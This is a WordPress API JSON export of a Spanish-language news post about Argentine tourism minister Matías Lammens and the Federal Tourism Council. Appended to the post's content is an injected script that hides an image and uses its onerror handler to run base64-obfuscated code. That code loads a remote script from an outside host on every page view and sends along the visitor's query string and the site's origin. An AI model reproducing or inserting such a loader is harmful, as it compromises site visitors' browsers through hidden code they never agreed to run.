{"id":5180,"date":"2022-04-04T10:13:24","date_gmt":"2022-04-04T13:13:24","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5180"},"modified":"2025-08-13T16:21:27","modified_gmt":"2025-08-13T19:21:27","slug":"lammens-la-agenda-del-futuro-turistico-se-desarrolla-sin-diferencias-politicas","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5180","title":{"rendered":"Lammens: la agenda del futuro tur\u00edstico se desarrolla \u00absin diferencias pol\u00edticas\u00bb"},"content":{"rendered":"\n<h4 class=\"has-text-color wp-block-heading\" id=\"en-declaraciones-a-telam-radio-el-ministro-de-turismo-aseguro-que-el-nuevo-desafio-es-que-el-turismo-receptivo-sea-uno-de-los-grandes-motores-que-apuntale-la-recuperacion-economica-de-la-argentina\" style=\"color:#0c2943\">En declaraciones a T\u00e9lam Radio, el ministro de Turismo asegur\u00f3 que el nuevo desaf\u00edo \u00abes que el turismo receptivo sea uno de los grandes motores que apuntale la recuperaci\u00f3n econ\u00f3mica de la Argentina\u201d.<\/h4>\n\n\n\n<p>El\u00a0<strong>ministro de Turismo y Deportes, Mat\u00edas Lammens<\/strong>, destac\u00f3 este mi\u00e9rcoles el trabajo que realizan en conjunto las 24 jurisdicciones del pa\u00eds expresadas en el\u00a0<strong>Consejo Federal de Turismo (CFT)<\/strong>, y remarc\u00f3 que \u00abno existen diferencias\u00bb pol\u00edticas para desarrollar la \u00abagenda de futuro\u00bb que tiene la actividad en funci\u00f3n de impulsar \u00abla recuperaci\u00f3n definitiva de la Argentina\u00bb.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-rich is-provider-soundcloud wp-block-embed-soundcloud\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Turismo: Lammens destaca \u201cagenda de futuro\u201d que comparten las 24 jurisdicciones sin \u201cdiferencias\u201d by Audio\" width=\"640\" height=\"400\" scrolling=\"no\" frameborder=\"no\" src=\"https:\/\/w.soundcloud.com\/player\/?visual=true&#038;url=https%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F1241278024&#038;show_artwork=true&#038;maxheight=960&#038;maxwidth=640\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>En declaraciones a&nbsp;<strong>T\u00e9lam Radio<\/strong>, el Ministro dijo que el trabajo junto a las 24 jurisdicciones de todo el pa\u00eds en el Consejo Federal de Turismo, demuestra \u00abque aqu\u00ed no existen diferencias, que&nbsp;<strong>todos estamos trabajando para impulsar y sostener al turismo m\u00e1s all\u00e1 del gobierno de turno<\/strong>, como una de las actividades, como uno de los sectores que impulsa la recuperaci\u00f3n definitiva del pa\u00eds\u00bb<\/p>\n\n\n\n<p>En ese sentido, Lammens asegur\u00f3 que en esta nueva instancia \u201cse viene la ruta natural, uno de los grandes desaf\u00edos con financiamiento internacional\u00bb que tiene \u00abel Banco Interamericano de Desarrollo (BID) atr\u00e1s\u00bb.<\/p>\n\n\n\n<p>\u00abEste nuevo desaf\u00edo -continu\u00f3- es&nbsp;<strong>que el turismo receptivo sea uno de los grandes motores que ayude, que apuntale, que consolide la recuperaci\u00f3n econ\u00f3mica que est\u00e1 teniendo la Argentina<\/strong>\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"void(0);\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2022\/03\/62445a675e6b7_900.jpg\" alt=\"El Consejo Federal de Turismo se reuni en Rosario Foto Twitter\" \/><\/a><figcaption>El Consejo Federal de Turismo se reuni\u00f3 en Rosario (Foto Twitter).<\/figcaption><\/figure>\n\n\n\n<p>\u201cSabemos lo que significa el turismo receptivo, el turismo de extranjeros visit\u00e1ndonos en nuestro pa\u00eds en t\u00e9rmino de d\u00f3lares, de divisas que ingresan, que son tan necesarias, y tambi\u00e9n en t\u00e9rminos de empleos, fortalecimiento de las econom\u00edas regionales\u201d, apunt\u00f3.<\/p>\n\n\n\n<p>Lammens particip\u00f3 este martes de la jornada en que se cumpli\u00f3 la 157\u00aa Asamblea del Consejo Federal de Turismo (CFT) en Rosario, provincia de Santa Fe, en la que las m\u00e1ximas autoridades del sector eligieron al tucumano Sebasti\u00e1n Giobellina como presidente del cuerpo federal.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202203\/587968-lammens-consejo-federal-de-turismo.html\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"1024\" height=\"122\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital-1024x122.jpg\" alt=\"\" class=\"wp-image-4959\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital-1024x122.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital-300x36.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital-768x92.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital-696x83.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital-1068x127.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/Telam-digital.jpg 1123w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En declaraciones a T\u00e9lam Radio, el ministro de Turismo asegur\u00f3 que el nuevo desaf\u00edo \u00abes que el turismo receptivo sea uno de los grandes motores que apuntale la recuperaci\u00f3n econ\u00f3mica de la Argentina\u201d. El\u00a0ministro de Turismo y Deportes, Mat\u00edas Lammens, destac\u00f3 este mi\u00e9rcoles el trabajo que realizan en conjunto las 24 jurisdicciones del pa\u00eds expresadas [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5181,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5180","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5180","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5180"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5180\/revisions"}],"predecessor-version":[{"id":10694,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5180\/revisions\/10694"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5181"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5180"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5180"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5180"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}